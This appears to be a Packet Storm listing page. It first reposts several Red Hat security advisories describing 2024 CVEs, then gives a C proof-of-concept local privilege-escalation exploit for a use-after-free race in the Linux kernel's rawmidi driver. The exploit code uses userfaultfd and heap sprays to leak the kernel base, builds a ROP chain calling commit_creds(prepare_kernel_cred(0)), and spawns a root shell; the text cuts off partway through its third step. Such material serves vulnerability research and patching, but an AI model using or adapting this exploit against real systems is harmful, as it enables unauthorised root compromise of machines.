Red Hat Security Advisory 2024-6313-03 - An update for kpatch-patch-5_14_0-284_52_1 and kpatch-patch-5_14_0-284_79_1 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6313.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch-5_14_0-284_52_1 and kpatch-patch-5_14_0-284_79_1 security updateAdvisory ID:        RHSA-2024:6313-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6313Issue date:         2024-09-04Revision:           03CVE Names:          CVE-2024-41090====================================================================Summary: An update for kpatch-patch-5_14_0-284_52_1 and kpatch-patch-5_14_0-284_79_1 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel.  This patch module is targeted for kernel-5.14.0-284.52.1.el9_2.Security Fix(es):* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-41090References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2299240https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-6313-03

Red Hat Security Advisory 2024-6312-03 - An update for python3.11-setuptools is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6312.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python3.11-setuptools security updateAdvisory ID:        RHSA-2024:6312-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6312Issue date:         2024-09-04Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for python3.11-setuptools is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Setuptools is a collection of enhancements to the Python 3 distutils that allow you to more easily build and distribute Python 3 packages, especially ones that have dependencies on other packages.  This package also contains the runtime components of setuptools, necessary to execute the software that requires pkg_resources.Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6312-03

Red Hat Security Advisory 2024-6311-03 - An update for resource-agents is now available for Red Hat Enterprise Linux 8. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6311.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: resource-agents security update  
Advisory ID:        RHSA-2024:6311-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6311  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2024-6345  
====================================================================

Summary: 

An update for resource-agents is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The resource-agents packages provide the Pacemaker and RGManager service managers with a set of scripts. These scripts interface with several services to allow operating in a high-availability (HA) environment.

Security Fix(es):

* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)

* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-6345

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2292788  
https://bugzilla.redhat.com/show_bug.cgi?id=2297771  
https://issues.redhat.com/browse/RHEL-50041

Red Hat Security Advisory 2024-6311-03

Red Hat Security Advisory 2024-6310-03 - An update for resource-agents is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6310.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: resource-agents security updateAdvisory ID:        RHSA-2024:6310-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6310Issue date:         2024-09-04Revision:           03CVE Names:          CVE-2024-37891====================================================================Summary: An update for resource-agents is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The resource-agents packages provide the Pacemaker and RGManager service managers with a set of scripts. These scripts interface with several services to allow operating in a high-availability (HA) environment.Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-37891References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2292788

Red Hat Security Advisory 2024-6310-03

Red Hat Security Advisory 2024-6309-03 - An update for fence-agents is now available for Red Hat Enterprise Linux 8. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6309.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: fence-agents security updateAdvisory ID:        RHSA-2024:6309-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6309Issue date:         2024-09-04Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for fence-agents is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2292788https://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6309-03

Red Hat Security Advisory 2024-6016-03 - Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6016.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.30 packages and security update  
Advisory ID:        RHSA-2024:6016-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6016  
Issue date:         2024-09-05  
Revision:           03  
CVE Names:          CVE-2024-34069  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.15.30. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:6013

Security Fix(es):

* python-werkzeug: user may execute code on a developer's machine  
(CVE-2024-34069)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

CVEs:

CVE-2024-34069

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2279451

Red Hat Security Advisory 2024-6016-03

Red Hat Security Advisory 2024-6013-03 - Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6013.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.30 bug fix and security update  
Advisory ID:        RHSA-2024:6013-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6013  
Issue date:         2024-09-05  
Revision:           03  
CVE Names:          CVE-2024-1737  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.30. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:6016

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* bind: bind9: BIND's database will be slow if a very large number of RRs  
exist at the same nam (CVE-2024-1737)  
* bind9: bind: SIG(0) can be used to exhaust CPU resources (CVE-2024-1975)  
* bind: bind9: Assertion failure when serving both stale cache data and  
authoritative zone content (CVE-2024-4076)  
* helm: Missing YAML Content Leads To Panic (CVE-2024-26147)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-1737

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265440  
https://bugzilla.redhat.com/show_bug.cgi?id=2298893  
https://bugzilla.redhat.com/show_bug.cgi?id=2298901  
https://bugzilla.redhat.com/show_bug.cgi?id=2298904  
https://issues.redhat.com/browse/OCPBUGS-33076  
https://issues.redhat.com/browse/OCPBUGS-36719  
https://issues.redhat.com/browse/OCPBUGS-37452  
https://issues.redhat.com/browse/OCPBUGS-38023  
https://issues.redhat.com/browse/OCPBUGS-38198  
https://issues.redhat.com/browse/OCPBUGS-38262  
https://issues.redhat.com/browse/OCPBUGS-38561  
https://issues.redhat.com/browse/OCPBUGS-38613  
https://issues.redhat.com/browse/OCPBUGS-38787  
https://issues.redhat.com/browse/OCPBUGS-38861  
https://issues.redhat.com/browse/OCPBUGS-39041  
https://issues.redhat.com/browse/OCPBUGS-39080

Red Hat Security Advisory 2024-6013-03

Proof of concept exploit that uses a use-after-free vulnerability due to a race condition in MIDI devices in Linux Kernel version 5.6.13.

// gcc -o exploit exploit.c -masm=intel -static -s -lpthread  
#define _GNU_SOURCE  
#include <stdio.h>  
#include <stdlib.h>  
#include <stdbool.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <sys/ioctl.h>  
#include <errno.h>  
#include <string.h>  
#include <unistd.h>  
#include <stdint.h>  
#include <sound/asound.h>  
#include <sys/mman.h>  
#include <sys/syscall.h>  
#include <linux/userfaultfd.h>  
#include <sys/timerfd.h>  
#include <sys/ipc.h>  
#include <sys/msg.h>  
#include <pthread.h>  
#include <poll.h>

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \  
                        } while (0)

                        #define ADDRESS_PAGE_FAULT1 0x1337000  
#define ADDRESS_PAGE_FAULT2 0x3331000  
#define ADDRESS_PAGE_FAULT3 0x5551000  
#define PAGE_SIZE 0x1000  
#define DRIVER_RAWMIDI "/dev/snd/midiC0D0"

#define SNDRV_RAWMIDI_STREAM_OUTPUT 0

uint32_t uffd;  
uint32_t fd1, fd2, fd3;  
uint64_t next;  
uint64_t fake_table;

pthread_t thread[6];

bool release_page_fault = false;

static void *page;

unsigned long pivot;  
unsigned long kernel_base;  
unsigned long timerfd_tmrproc;

unsigned long usr_cs, usr_ss, usr_rflags, usr_sp;

struct args_trigger  
{  
    char *addr;  
    int size;  
    uint32_t fd;  
};

void hexdump(uint64_t *buf, uint64_t size)  
{  
    for (int i = 0; i < size / 8; i += 2)  
    {  
        printf("0x%x ", i * 8);  
        printf("%016lx %016lx\n", buf[i], buf[i + 1]);  
    }  
}

static void save_state()  
{  
    __asm__ __volatile__(  
    "movq %0, cs;"  
    "movq %1, ss;"  
    "pushfq;"  
    "popq %2;"  
    "movq %3, %%rsp\n"  
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags), "=r" (usr_sp) : : "memory" );  
}

static void getRootShell()  
{  
    if(getuid())  
    {  
        printf("[-] Failed to get a root");  
        exit(0);  
    }

    printf("[+] uid : %d\n", getuid());  
    printf("[+] Got root.\n");

    execl("/bin/sh", "sh", NULL);  
}

void register_userfaultfd(uint64_t *range)  
{  
    struct uffdio_api uffdio_api;  
    struct uffdio_register uffdio_register;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (uffd == -1)  
    {  
        perror("[-] userfaultfd");  
        exit(0);  
    }

    uffdio_api.api = UFFD_API;  
    uffdio_api.features = 0;

    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

    uffdio_register.range.start = (uint64_t) range;  
    uffdio_register.range.len = PAGE_SIZE;  
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    puts("[+] Userfaultfd registered");  
}

void *handler_userfaultfd(void *args)  
{  
    uint64_t uffd = *(uint64_t *)args;

    struct uffd_msg msg;  
    struct uffdio_copy uffdio_copy;  
    uint64_t nread;  
    void *page2 = NULL;

    if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    uint64_t m_ts = 0x000000000000ffff;  
    memcpy(page2, (char *) &m_ts, 8);

    while (true)  
    {  
        struct pollfd pollfd;  
        int nready;

        pollfd.fd = uffd;  
        pollfd.events = POLLIN;

                nready = poll(&pollfd, 1, -1);

        if (nready == -1)  
        {  
            perror("[-] poll");  
            exit(0);  
        }

        nread = read(uffd, &msg, sizeof(msg));

                if (nread == 0)  
        {  
            perror("[-] EOF on userfaultfd!\n");  
            exit(0);  
        }

        if (nread == -1)  
        {  
            perror("[-] read");  
            exit(0);  
        }

        char *page_fault_location = (char *)msg.arg.pagefault.address;

        if (msg.event != UFFD_EVENT_PAGEFAULT)  
        {  
            perror("[-] Unexpected event on userfaultfd");  
            exit(0);  
        }

        if (msg.arg.pagefault.address == (void *)0x1337000 || msg.arg.pagefault.address == (void *)0x3331000 || msg.arg.pagefault.address == (void *)0x5551000)  
        {  
            printf("[+] Page Fault triggered on address 0x%llx\n", msg.arg.pagefault.address);

            if(msg.arg.pagefault.address == (void *)0x5551000)  
            {  
                memcpy(page2, (char *) &fake_table, 8);  
            }

            while (release_page_fault == false);

            uffdio_copy.src = (uint64_t) page2;  
            uffdio_copy.dst = (uint64_t) msg.arg.pagefault.address &~(PAGE_SIZE - 1);  
            uffdio_copy.len = PAGE_SIZE;  
            uffdio_copy.mode = 0;  
            uffdio_copy.copy = 0;

            if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)  
            {  
                perror("[-] ioctl");  
                exit(0);  
            }

            release_page_fault = false;  
        }  
    }

    close(uffd);  
    puts("[+] Page fault thread finished");  
}

void *trigger_userfaultfd(struct args_trigger *args)  
{  
    char *addr = (char *) args->addr;  
    int size = args->size;  
    uint32_t fd = (uint64_t) args->fd;

    write(fd, addr, size);  
}

void send_msg(int qid, const void *msg_buf, size_t size, long mtype)  
{  
    struct msgbuf  
    {  
        long mtype;  
        char mtext[size - 0x30];  
    } msg;

    msg.mtype = mtype;  
    memcpy(msg.mtext, msg_buf, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)  
    {  
        perror("msgsnd");  
        exit(1);  
    }  
}

void *recv_msg(int qid, size_t size)  
{  
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1)  
    {  
        perror("msgrcv");  
        return NULL;  
    }

    return memdump;  
}

void build_rop(char *buf)  
{  
    uint64_t *rop = (uint64_t *)&buf[0x0];  
    int k = 0;

    /* commit_creds(prepare_kernel_cred(0)) */  
    rop[k++] = kernel_base + 0x15e8; // pop rdi ; ret  
    rop[k++] = 0x0;  
    rop[k++] = kernel_base + 0x8a800; // prepare_kernel_cred  
    rop[k++] = kernel_base + 0x49fb8; // pop rdx ; ret  
    rop[k++] = 0x8;  
    rop[k++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret  
    rop[k++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret  
    rop[k++] = kernel_base + 0x8a3c0; // commit_creds

    /* kpti trampoline */  
    rop[k++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22  
    rop[k++] = 0x0; // rax  
    rop[k++] = 0x0; // rdi

        rop[k++] = (unsigned long)&getRootShell;  
    rop[k++] = (unsigned long)usr_cs;  
    rop[k++] = (unsigned long)usr_rflags;  
    rop[k++] = (unsigned long)usr_sp;  
    rop[k++] = (unsigned long)usr_ss;

    uint64_t *func_table = (uint64_t *)&buf[0x100];  
    for (size_t i = 0; i < 12; i++)  
    {  
        if (i == 4)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret;  
            continue;  
        }

        if (i == 5)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        if (i == 6)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        *func_table++ = 0xdeadbeefdeadbe00 + i;  
    }

    *func_table = pivot;  
}

void pin_cpu(long cpu_id)  
{  
    cpu_set_t mask;

    CPU_ZERO(&mask);  
    CPU_SET(cpu_id, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)  
    {  
        err("`sched_setaffinity()` failed: %s", strerror(errno));  
    }

    return;  
}

void main(void)  
{  
    pin_cpu(0);

    struct snd_rawmidi_params srp;

    save_state();

    /* ===================== [ SETP 1 - KASLR Leak ] ===================== */

    puts("[+] STEP 1 : KASLR leak");  
    fd1 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd1 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    int qid[2];  
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    struct itimerspec its;

    its.it_interval.tv_sec = 0;  
    its.it_interval.tv_nsec = 0;  
    its.it_value.tv_sec = 9999;  
    its.it_value.tv_nsec = 0;

    int tfd[256];

    for(int i = 0; i < 256 / 2; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    char *addr = page;  
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 240;  
    srp.avail_min = 1;  
    uint64_t err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 256");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    struct args_trigger args;  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd1;

    /* Blocking before object created by size 256 in userfault */  
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */  
    srp.buffer_size = 250;  
    err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 256 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* send_msg 'A' */  
    char buf[0xf8 - 0x30];  
    memset(buf, 0x41, sizeof(buf));  
    send_msg(qid[0], buf, 0xf8, 1);

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */  
    for(int i = 256 / 2; i < 256; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    // hexdump(leak, 0x2000);

    timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));  
    kernel_base = timerfd_tmrproc - 0x2201f0;  
    pivot = kernel_base + 0x8fc625; // push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);  
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);  
    printf("[+] pivot addr : 0x%lx\n", pivot);

    for(int i = 0; i < 256; i++)  
    {  
        close(tfd[i]);  
    }

    close(fd1);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 2 - SMAP Bypass ] ===================== */

    puts("\n[+] STEP 2 : SMAP bypass");

        release_page_fault = false;

    fd2 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd2 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'B', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 512 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 500;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 512");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd2;

    /* Blocking before object created by size 512 in userfault */  
    pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 512 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 512 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* rop spray in kmalloc-512 */  
    char secondary_buf[0x1ea - 0x30];  
    memset(secondary_buf, 0, sizeof(secondary_buf));  
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)  
    {  
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);  
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);  
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;  
    fake_table = next + 0x100;

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);  
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);

    // hexdump(leak2, 0x2000);

    close(fd2);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 3 - tty_struct->ops overwrite ] ===================== */

    puts("\n[+] STEP 3 : Fake tty_struct->ops overwrite");

    release_page_fault = false;

    fd3 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd3 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Re-opening rawmidi");

